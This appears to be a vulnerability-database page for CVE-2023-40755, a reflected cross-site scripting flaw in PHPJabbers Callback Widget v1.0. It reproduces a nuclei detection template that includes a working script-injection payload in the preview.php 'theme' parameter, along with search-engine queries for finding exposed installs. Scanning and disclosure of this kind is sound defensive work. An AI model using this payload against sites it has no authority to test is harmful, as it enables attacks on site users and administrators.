Lucene search
K

PHPJabbers Callback Widget v1.0 - Cross-Site Scripting

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 20 Views

PHPJabbers Callback Widget v1.0 has a Cross-Site Scripting (XSS) vulnerability in the "theme" parameter of preview.php

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2023-40755
28 Aug 202313:15
attackerkb
Circl
CVE-2023-40755
28 Aug 202316:17
circl
CNNVD
PHPJabbers Callback Widget 跨站脚本漏洞
28 Aug 202300:00
cnnvd
CVE
CVE-2023-40755
28 Aug 202300:00
cve
Cvelist
CVE-2023-40755
28 Aug 202300:00
cvelist
EUVD
EUVD-2023-45308
3 Oct 202520:07
euvd
NVD
CVE-2023-40755
28 Aug 202313:15
nvd
OSV
CVE-2023-40755
28 Aug 202313:15
osv
Prion
Cross site scripting
28 Aug 202313:15
prion
Positive Technologies
PT-2023-27620 · Phpjabbers · Phpjabbers Callback Widget
28 Aug 202300:00
ptsecurity
Rows per page
id: CVE-2023-40755

info:
  name: PHPJabbers Callback Widget v1.0 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    There is a Cross Site Scripting (XSS) vulnerability in the "theme" parameter of preview.php in PHPJabbers Callback Widget v1.0.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through the theme parameter in preview.php, potentially stealing callback widget administrator credentials and manipulating callback requests.
  remediation: |
    Update PHPJabbers Callback Widget to a version newer than 1.0 that properly sanitizes the theme parameter and encodes output in preview.php.
  reference:
    - https://medium.com/@tfortinsec/multiple-vulnerabilities-in-phpjabbers-part-3-40fc3565982f
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40755
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-40755
    cwe-id: CWE-79
    epss-score: 0.01202
    epss-percentile: 0.64503
    cpe: cpe:2.3:a:phpjabbers:callback_widget:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"PHPJabbers"
    fofa-query: body="PHPJabbers"
    vendor: phpjabbers
    product: callback_widget
  tags: cve,cve2023,phpjabbers,callback-widget,xss,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: word
        part: body
        words:
          - 'PHPJabbers'
        case-insensitive: true
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/preview.php?theme=theme10dnel8%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3Eko0so"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'theme=theme10dnel8"><script>alert(document.domain)</script>ko0'

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a004730450220595ec5ac1cf22a91780345aacc061aa795a50b4c2fca8d791bca37467e6b3ae0022100f3257fbe2d07bd2173b2a636f942098d2a64a108bf5ff276ab3a420a16b7d792:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.16.1
EPSS0.01202
SSVC
20